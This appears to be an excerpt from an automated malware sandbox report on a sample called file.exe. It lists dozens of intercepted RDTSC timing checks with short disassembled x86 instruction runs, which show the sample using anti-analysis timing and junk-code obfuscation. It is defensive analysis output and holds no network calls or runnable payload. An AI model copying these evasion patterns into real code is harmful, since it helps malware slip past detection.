              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9FAE second address: BA9FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F0B48B8DEECh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9FC7 second address: BA9FD1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48765F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA4DE second address: BAA4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA4E4 second address: BAA4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA4E8 second address: BAA4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA4EC second address: BAA4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD5DE second address: BAD616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1836h], eax 0x00000010 mov edi, dword ptr [ebp+122D38B6h] 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D33F2h], ebx 0x0000001e mov dword ptr [ebp+122D1B47h], eax 0x00000024 push 00000000h 0x00000026 movzx esi, bx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jnl 00007F0B48B8DEECh 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD616 second address: BAD620 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B48765F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE0AB second address: BAE0B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE0B0 second address: BAE10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F0B48765F2Bh 0x0000000d nop 0x0000000e push esi 0x0000000f call 00007F0B48765F32h 0x00000014 sbb edi, 5BDE0923h 0x0000001a pop esi 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F0B48765F28h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push 00000000h 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE10E second address: BAE112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE112 second address: BAE118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAEBC7 second address: BAEBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE904 second address: BAE90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE90A second address: BAE90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAEBCB second address: BAEBD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE90E second address: BAE912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAFDF5 second address: BAFE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB52E4 second address: BB52F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEAh 0x00000007 jg 00007F0B48B8DEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB52F8 second address: BB5302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0B48765F26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5302 second address: BB5306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB58F6 second address: BB58FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB58FA second address: BB5900 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5900 second address: BB590A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0B48765F26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB692F second address: BB6939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0B48B8DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6939 second address: BB694B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F0B48765F2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB694B second address: BB6954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5AF2 second address: BB5AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8ACB second address: BB8AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0B48B8DEF9h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007F0B48B8DEF0h 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9AD1 second address: BB9AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8C24 second address: BB8C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAA78 second address: BBAA7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9D29 second address: BB9D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9D37 second address: BB9D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBBA5 second address: BBBBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBBB1 second address: BBBBB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBBB7 second address: BBBBBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE7B second address: BBBE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE81 second address: BBBE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC21 second address: BBDC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC25 second address: BBDC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDC33 second address: BBDC39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBEBD7 second address: BBEBF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFB47 second address: BBFBCF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B48765F28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1D5Ch], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F0B48765F28h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jmp 00007F0B48765F2Ah 0x00000034 mov ebx, dword ptr [ebp+122D36BAh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F0B48765F28h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jmp 00007F0B48765F36h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F0B48765F28h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDD8C second address: BBDD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1B2A second address: BC1B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0B48765F30h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3148 second address: BC316B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnl 00007F0B48B8DEE6h 0x0000000d jmp 00007F0B48B8DEEBh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007F0B48B8DEE6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDD91 second address: BBDE4C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B48765F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0B48765F28h 0x00000012 pop edx 0x00000013 nop 0x00000014 jmp 00007F0B48765F36h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F0B48765F28h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a add edi, dword ptr [ebp+122D2E28h] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 jmp 00007F0B48765F31h 0x0000004c mov eax, dword ptr [ebp+122D0B91h] 0x00000052 mov dword ptr [ebp+122D5907h], edx 0x00000058 push FFFFFFFFh 0x0000005a movzx edi, bx 0x0000005d nop 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F0B48765F2Bh 0x00000065 jne 00007F0B48765F26h 0x0000006b popad 0x0000006c pop edx 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jnp 00007F0B48765F36h 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDE4C second address: BBDE56 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0B48B8DEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD00 second address: BBFD04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD04 second address: BBFD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0B48B8DEE8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov bx, dx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 sub dword ptr [ebp+12450B21h], eax 0x00000039 mov eax, dword ptr [ebp+122D1149h] 0x0000003f add di, D700h 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007F0B48B8DEE8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 0000001Ch 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 cld 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 jmp 00007F0B48B8DEF7h 0x0000006a pop esi 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD8D second address: BBFD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC46A6 second address: BC46AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC46AD second address: BC46C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B48765F30h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6752 second address: BC6757 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC776F second address: BC7775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7775 second address: BC7779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC785E second address: BC7864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6ABA4 second address: B6ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6ABAA second address: B6ABCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F0B48765F43h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1845 second address: BD1850 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F20 second address: BD0F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F24 second address: BD0F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0B48B8DEF3h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F3F second address: BD0F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F43 second address: BD0F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F49 second address: BD0F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F0B48765F2Bh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jo 00007F0B48765F26h 0x00000012 popad 0x00000013 jno 00007F0B48765F34h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e jnp 00007F0B48765F26h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0F87 second address: BD0F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD10FD second address: BD1107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1408 second address: BD140C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3061 second address: BD3065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3065 second address: BD3069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3069 second address: BD3075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3075 second address: BD3079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3079 second address: BD3081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD71ED second address: BD71F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F02B second address: B5F03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F0B48765F32h 0x0000000b jc 00007F0B48765F26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8688 second address: BD868D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD868D second address: BD86C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B48765F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F0B48765F30h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007F0B48765F30h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD86C7 second address: BD86CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD86CB second address: BD86DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007F0B48765F34h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD86DD second address: BD86F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD88A3 second address: BD88E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48765F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 jnp 00007F0B48765F2Ch 0x00000019 pop esi 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F0B48765F35h 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F0B48765F2Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD88E8 second address: BD88EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD88EC second address: 9FFB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007F0B48765F43h 0x00000013 je 00007F0B48765F3Dh 0x00000019 jmp 00007F0B48765F37h 0x0000001e pop eax 0x0000001f jno 00007F0B48765F2Eh 0x00000025 jns 00007F0B48765F31h 0x0000002b push dword ptr [ebp+122D0BD9h] 0x00000031 jmp 00007F0B48765F2Ah 0x00000036 call dword ptr [ebp+122D1A63h] 0x0000003c pushad 0x0000003d add dword ptr [ebp+122D1B47h], ebx 0x00000043 xor eax, eax 0x00000045 mov dword ptr [ebp+122D1C6Bh], edx 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f jmp 00007F0B48765F33h 0x00000054 mov dword ptr [ebp+122D36CAh], eax 0x0000005a stc 0x0000005b stc 0x0000005c mov esi, 0000003Ch 0x00000061 jmp 00007F0B48765F32h 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a add dword ptr [ebp+122D1AE6h], edx 0x00000070 lodsw 0x00000072 or dword ptr [ebp+122D1AE6h], eax 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007F0B48765F37h 0x00000081 jmp 00007F0B48765F33h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a mov dword ptr [ebp+122D1B6Ah], eax 0x00000090 push eax 0x00000091 push ebx 0x00000092 push esi 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE470 second address: BDE474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD20B second address: BDD218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F0B48765F2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
